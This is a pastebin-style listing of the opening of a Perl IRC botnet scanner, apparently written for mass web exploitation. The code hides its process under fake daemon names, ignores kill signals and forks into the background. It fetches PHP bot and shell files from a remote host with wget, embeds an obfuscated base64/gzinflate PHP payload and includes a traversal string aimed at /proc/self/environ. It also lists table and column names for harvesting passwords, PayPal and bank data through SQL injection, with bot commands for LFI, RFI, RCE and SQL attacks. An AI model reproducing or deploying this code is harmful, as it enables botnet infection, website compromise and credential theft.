Scanner

From x, 3 Years ago, written in Plain Text, viewed 1'760 times.
URL http://paste.security-portal.cz/view/ca3e3077 Embed
Download Paste or View Raw
  1. #!/usr/bin/perl
  2. #################################################
  3. #                  _,.-----.,_
  4. #               ,-~           ~-.
  5. #             ,^___   -TijN-   ___^.
  6. #           Y  ,--._    I    _.--.  Y
  7. #           | Y     ~-. | ,-~     Y |
  8. #           | |        }:{        | |
  9. #           j l       / | \       ! l
  10. #        .-~  (__,.--" .^. "--.,__)  ~-.
  11. #       (           / / | \ \           )
  12. #        \.____,   ~  \/"\/  ~   .____,/
  13. #         ^.____                 ____.^
  14. #            | |T ~\  !   !  /~ T| |
  15. #            | |l   _ _ _ _ _   !| |
  16. #            | l \/V V V V V V\/ j |
  17. #            l  \ \|_|_|_|_|_|/ /  !
  18. #             \  \[T T T T T TI/  /
  19. #              \  `^-^-^-^-^-^'  /
  20. #               \               /
  21. #                \.           ,/
  22. #                  "^-.___,-^"
  23. #################################################
  24. #    THE REAL FREAKZ BLEND, Ha45K GREETZ U..    #
  25. #    IF U DONT UNDERSTAND THIS, DONT USE IT!    #
  26. # --------------------------------------------- #
  27. #   SO STOP MAKEING LIL SCAN CHANS FOR ME!!!!   #
  28. #################################################
  29. use HTTP::Request;                              #
  30. use HTTP::Request::Common;                      #
  31. use HTTP::Request::Common qw(POST);             #
  32. use URI::Escape;                                #
  33. use LWP::Simple;                                #
  34. use LWP 5.64;                                   #
  35. use LWP::UserAgent;                             #
  36. use Socket;                                     #
  37. use IO::Socket;                                 #
  38. use IO::Socket::INET;                           #
  39. use IO::Select;                                 #
  40. use MIME::Base64;                               #
  41. use Digest::MD5 qw(md5_hex);                    #
  42. #################################################
  43.  
  44. #$exists = kill 0, `head -1 .scn.pid`;
  45. #unless ($exists) { exec `tail -1 .scn.pid` }
  46. #if($exists) { die "bot all ready running"; }
  47.  
  48. my $datetime = localtime;
  49.  
  50. my $fakeproc = ('\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x68\x74\x74\x70\x64',
  51.                          '\x2f\x75\x73\x72\x2f\x6c\x6f\x63\x61\x6c\x2f\x61\x70\x61\x63\x68\x65\x2f\x62\x69\x6e\x2f\x68\x74\x74\x70\x64\x20\x2d\x73\x74\x61\x72\x74',
  52.                          '\x2f\x73\x62\x69\x6e\x2f\x73\x79\x73\x6c\x6f\x67\x64',
  53.                          '\x5b\x44\x65\x63\x6f\x5d',
  54.                          '\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x6f\x67\x64\x20\x2d\x63\x20\x31\x20\x2d\x78\x20\x2d\x78',
  55.                          '\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x61\x63\x70\x69\x64',
  56.                          '\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x63\x72\x6f\x6e',
  57.                          '\x5b\x68\x74\x74\x70\x64\x73\x5d',
  58.                          '\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x68\x74\x74\x70\x64',
  59.                          '\x5b\x62\x61\x73\x68\x5d');
  60.  
  61. my $verbindnaar = "$ARGV[0]" if $ARGV[0];
  62. my $deurtje             = "$ARGV[1]" if $ARGV[1];
  63. my $channel             = "#".$ARGV[2] if $ARGV[2];
  64. my $admin               = "$ARGV[3]" if $ARGV[3];
  65. my $injurl              = "$ARGV[4]" if $ARGV[4];
  66. my $blog                = "$ARGV[5]" if $ARGV[5];
  67.  
  68. my $shchn       = "#sshow";
  69.  
  70. my $nob0dy    = "4,1CraZy8Creation9Zzz ";
  71. my $lfilogo   = "12(4@LFI12)";
  72. my $lfdlogo   = "12(4@LFD12)";
  73. my $rfilogo   = "12(4@RFI12)";
  74. my $rcelogo   = "12(4@RCE12)";
  75. my $e107logo  = "12(4@e10712)";
  76. my $xmllogo   = "12(4@XML12)";
  77. my $sqllogo   = "12(4@SQL12)";
  78. my $oscologo  = "12(4@OSCO12)";
  79. my $cpanlogo  = "12(4@Cpanel12)";
  80. my $zenlogo   = "12(4@ZEN12)";
  81. my $oplogo    = "12(4@OpenCart12)";
  82. my $admlogo   = "12(4@phpMyAdmin12)";
  83. my $ossqllogo = "12(4@OSCO-SQL12)";
  84. my $timlogo   = "12(4@TIMTHUMB12)";
  85. my $zerologo  = "12(4@zBoard12)";
  86.  
  87. my %cmds = (
  88.   lficmd    => '!lfi',
  89.   lfdcmd    => '!lfd',
  90.   rficmd    => '!rfi',
  91.   rcecmd    => '!rce',
  92.   e107cmd   => '!e107',
  93.   xmlcmd    => '!xml',
  94.   sqlcmd    => '!sql',
  95.   oscocmd   => '!osco',
  96.   cpancmd   => '!cpan',
  97.   zencmd    => '@zen',
  98.   opcmd     => '!op',
  99.   admcmd    => '!adm',
  100.   timcmd    => '!tim',
  101.   zerocmd       => '!zboard'
  102. );
  103.  
  104. my $cmdlfi    = '!cmdlfi';
  105. my $cmde107   = '!cmde107';
  106. my $cmdxml    = '!cmdxml';
  107.  
  108. my $injector  = $injurl."/bt.php?";
  109. my $botshell  = $injurl."/sh.txt?";
  110.  
  111. my $b0tcmd = "eval(gzinflate(base64_decode('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')));";
  112.  
  113. my @uagents   = ('Microsoft Internet Explorer/4.0b1 (Windows 95)','Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)','Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)',
  114.                                  'Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)','Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)','Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
  115.                                  'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)','Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)',
  116.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
  117.                                  'Mozilla/4.40 (compatible; MSI4E 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)',
  118.                                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)','Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)','Mozilla/4.0 (compatible; MSIE 7.0b; Win32)',
  119.                                  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)','Microsoft Pocket Internet Explorer/0.6','Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)',
  120.                                  'MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)',
  121.                                  'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
  122.                                  'Advanced Browser (http://www.avantbrowser.com)','Avant Browser (http://www.avantbrowser.com)','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
  123.                                  'Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)','Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)',
  124.                                  'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511','Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929',
  125.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0','Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox',
  126.                                  'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
  127.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6','Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6',
  128.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7','Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
  129.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4','Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4',
  130.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
  131.                                  'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1','Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1',
  132.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1','Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1',
  133.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2','Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0',
  134.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b','Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
  135.                                  'Mozilla/3.0 (OS/2; U)','Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)','Mozilla/4.61 (Macintosh; I; PPC)','Mozilla/4.61 [en] (OS/2; U)',
  136.                                  'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)','Mozilla/4.8 [en] (Windows NT 5.0; U)','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
  137.                                  'msnbot/1.1 (+http://search.msn.com/msnbot.htm)','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
  138.                                  'FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)','Gigabot/3.0 (http://www.gigablast.com/spider.html)','gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)',
  139.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12','IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)',
  140.                                  'Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4','Infoseek SideWinder/2.0B (Linux 2.4 i686)','Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6',
  141.                                  'Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)','Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1',
  142.                                  'Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)','Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)');
  143.                                  
  144. my $uagent    = $uagents[rand(scalar(@uagents))];
  145. my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
  146. my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  147. my $adm_output = ("0WN4GE");
  148. my $open_output = ("FCKeditor - Connectors Tests");
  149.  
  150. my @tabele              = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','name','names','nombre','nombres',
  151.                                         'usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator','passwd',
  152.                                         'administrators','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','mods',
  153.                                         'user_name','user_names','member_password','mod','moderators','moderator','user_email','user_emails','user_mail',
  154.                                         'user_mails','mail','emails','email','address','e-mail','emailaddress','correo','correos','phpbb_users','log',
  155.                                         'logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tpassword','tPassword',
  156.                                         'u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave',
  157.                                         'login_id','pwd','pas','sistema_id','sistema_usuario','sistema_password','contrasena','auth','key','senha',
  158.                                         'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
  159.                                         'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account',
  160.                                         'accnts','associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers',
  161.                                         'utilisateurs','password','amministratore','god','God','authors','asociado','asociados','autores','membername',
  162.                                         'autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','paypal','credit','bank','transaction',
  163.                                         'order','account','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  164. my @kolumny             = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  165.                                         'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  166.                                         'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
  167.                                         'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  168.                                         'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  169.                                         'paypal','credit','bank','transaction','order','account','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password',
  170.                                         'autor','upassword','web_password','web_username');
  171.  
  172. my %conf = (
  173.   shchan => 1,          # Shell info shown in $shchn
  174.   ssfind => 0,          # Show search engine founded sites
  175.   ssdone => 0,          # Show when scan is done
  176.   soscos => 1,          # Show osco meby vurln sites
  177.   stindb => 0,          # Show TIMTHUMB results for debug
  178.   oscupl => 0,          # show osco file uploaded
  179.   xmlvln => 0           # show xml vulns (else founded with system info only)
  180. );
  181.  
  182. $SIG{'INT'}   = 'IGNORE';
  183. $SIG{'HUP'}   = 'IGNORE';
  184. $SIG{'TERM'}  = 'IGNORE';
  185. $SIG{'CHLD'}  = 'IGNORE';
  186. $SIG{'PS'}    = 'IGNORE';
  187.  
  188. chdir("/tmp");
  189. chop (my $priper = `rm -rf pbot.* && wget $injurl/bt.php -O pbot.jpg && rm -rf pbot.jpg.* && rm -rf sh.* && wget $injurl/sh.txt -O sh.jpg && rm -rf sh.jpg.* && rm -rf zero.* && wget $injurl/zero && rm -rf zero.*`);
  190. my $faceproc = $fakeproc[rand(scalar(@fakeproc))];
  191. $0 = "$faceproc"."\0" x 16;
  192. my $pid = fork;
  193. #open($f1le, ">", ".scn.pid");
  194. #printf $f1le = $pid;
  195. #close $f1le;
  196. exit if $pid;
  197. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  198.  
  199. our %irc_servers;
  200. our %DCC;
  201. my $dcc_sel = new IO::Select->new();
  202. $sel_client = IO::Select->new();
  203. sub sendraw {
  204.     if ($#_ == '1') {
  205.     my $socket = $_[0];
  206.     print $socket "$_[1]\n";
  207.     } else {
  208.         print $IRC_cur_socket "$_[0]\n";
  209.     }
  210. }
  211.  
  212. my @domen = ('biz','info','org','net','edu','gov','mil','ps','gr','off.ai','vu','kw','com.uy','aq','vg','lk','gw','eh','lv','sj','com.na','na','bv','com.ph','ph','ca','xn--p1ai','mp','td','be','kh','com.mx','mx','com.jm','jm','zr','com.ni','ni','com.gi','gi','th','co.th','co.ke','ke','va','it','to','kg','com.bo','bo','com.mt','tm','ge','co.ls','ls','mz','sc','ee','tc','com.bz','bz','cv','co.kr','co.cr','cr','am','yu','com.ar','ar','li','ne','re','co.il','il','com.pr','pr','com.et','et','co.id','id','iq','nc','co.in','sh','com.my','my','hr','bs','com.ec','ec','ba','ad','co.za','nl','cl','nz','co.nz','co.hu','hu','bg','is','co.uk','tf','er','gh','eu','uz','en','ie','co.im','la','fr','cd','co.ug','lc','tt','zw','com.bd','bd','ro','cf','io','an','pn','mh','ye','dm','sr','cn','bb','ru','mm','ms','hm','kn','tk','bt','fo','lr','pk','com.tj','com.ly','ly','com.sb','sb','tg','mt','si','lb','com.af','af','bj','jo','ax','pg','com.br','br','mr','ml','km','co.zm','ma','gb','kz','yt','mw','sd','mn','ky','bf','gm','kp','a1','lt','ch','lu','qa','ci','um','pa','com.pa','in','st','rw','ga','as','cx','co.ck','ck','sl','ht','co.ve','cz','com.pe','pe','md','bi','com.nf','nf','com.vn','me','tl','so','com.co','co','gn','gs','mo','fi','no','co.bw','bw','tv','bn','dz','co.vi','cm','com.om','om','com.do','do','pf','com.vc','nr','aw','sm','ao','mu','fm','gl','by','es','fk','gt','com.gt','co.je','hn','at','al','pw','mc','o1','ai','ua','ap','com.hk','hk','cy','com.pk','gp','eg','wf','kr','gf','com.au','pm','ae','us','com.np','np','cu','com.cu','fx','com.py','py','cs','gu','gd','pt','sz','tz','cg','sn','sy','pl','tr','com.sa','sa','ki','dj','ir','rs','com.sg','sg','ng','tn','mg','ws','com.tr','com.fj','fj','mq','sk','gq','mk','a2','nu','com.sv','sv','gy','mv','de','com.ag','ag','se','bh','com.tw','tw','cc','co.jp','jp','az');
  213. my @words = ('adult','aeroplane','air','aircraft carrier','airforce','airport','album','alphabet','apple','arm','army','baby','backpack','balloon','banana','bank','barbecue','bathroom','bathtub','bed','bee','bible','bird','bomb','book','boss','bottle','bowl','box','boy','brain','brige','butterfly','button','cappuccino','car','car-race','carpet','carrot','cave','chair','chess boar','chief','chil','chisel','chocolates','church','circle','circus','clock','clown','coffee','coffee-shop','comet','compact isc','compass','computer','crystal','cup','cycle','ata Base','esk','iamon','ress','rill','rink','rum','ung','ears','earth','egg','electricity','elephant','eraser','explosive','eyes','family','fan','feather','festival','film','finger','fire','floolight','flower','foot','fork','freeway','fruit','fungus','game','garen','gas','gate','gemstone','girl','gloves','go','grapes','guitar','hammer','hat','hieroglyph','highway','horoscope','horse','hose','ice','ice-cream','insect','Jet fighter','Junk','Kaleioscope','Kitchen','Knife','Leg','Library','Liqui','magnet','man','map','maze','meat','meteor','microscope','milk','milkshake','mist','money','monster','mosquito','mouth','nail','navy','necklace','neele','onion','paintBrush','pants','parachute','passport','pebble','penulum','pepper','perfume','pillow','plane','planet','pocket','post-office','potato','printer','prison','pyrami','raar','rainbow','recor','restaurant','rifle','ring','robot','rock','rocket','roof','room','rope','sale','salt','sanpaper','sanwich','satellite','school','sex','ship','shoes','shop','shower','signature','skeleton','slave','snail','software','soli','spaceshuttle','spectrum','sphere','spice','spiral','spoon','sports-car','spot Light','square','staircase','star','stomach','sun','sunglasses','surveyor','swimming Pool','swor','table','tapestry','teeth','telescope','television','tennis racquet','thermometer','tiger','toilet','tongue','torch','torpeo','train','treamill','triangle','tunnel','typewriter','umbrella','vacuum','vampire','vieotape','vulture','water','weapon','web','wheelchair','winow','woman','worm','x-ray','computer','pc');
  214.  
  215. sub connector {
  216.     my ($mynick,$ircserver_con,$ircport_con) = @_;
  217.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  218.     if (defined($IRC_socket)) {
  219.         $IRC_cur_socket = $IRC_socket;
  220.         $IRC_socket->autoflush(1);
  221.         $sel_client->add($IRC_socket);
  222.                 $irc_servers{$IRC_cur_socket}{'host'} = $ircserver_con;
  223.         $irc_servers{$IRC_cur_socket}{'port'} = $ircport_con;
  224.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  225.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  226.         nick("$mynick");
  227.         sendraw("USER BoT".(int(rand(999)))." ".$IRC_socket->sockhost." $ircserver_con :$nob0dy");
  228.         sleep (1);}}
  229. sub parse {
  230.     my $servarg = shift;
  231.     if ($servarg =~ /^PING \:(.*)/) {
  232.         sendraw("PONG :$1");
  233.     }
  234.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  235.         if (lc($1) eq lc($mynick)) {
  236.             $mynick = $4;
  237.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  238.         }
  239.     }
  240.     elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  241.         nick("$mynick".int rand(1));
  242.     }
  243.     elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  244.         $mynick = $2;
  245.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  246.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  247.         sendraw("MODE $mynick +ixp");
  248.         sendraw("JOIN $channel");
  249.         sleep(2);
  250.     }
  251.         elsif ($servarg =~ /002/ ) { sendraw("JOIN $channel");sleep(2); }
  252.         elsif ($servarg =~ /003/ ) { sendraw("JOIN $channel");sleep(2); }
  253.         elsif ($servarg =~ /004/ ) { sendraw("JOIN $channel");sleep(2); }
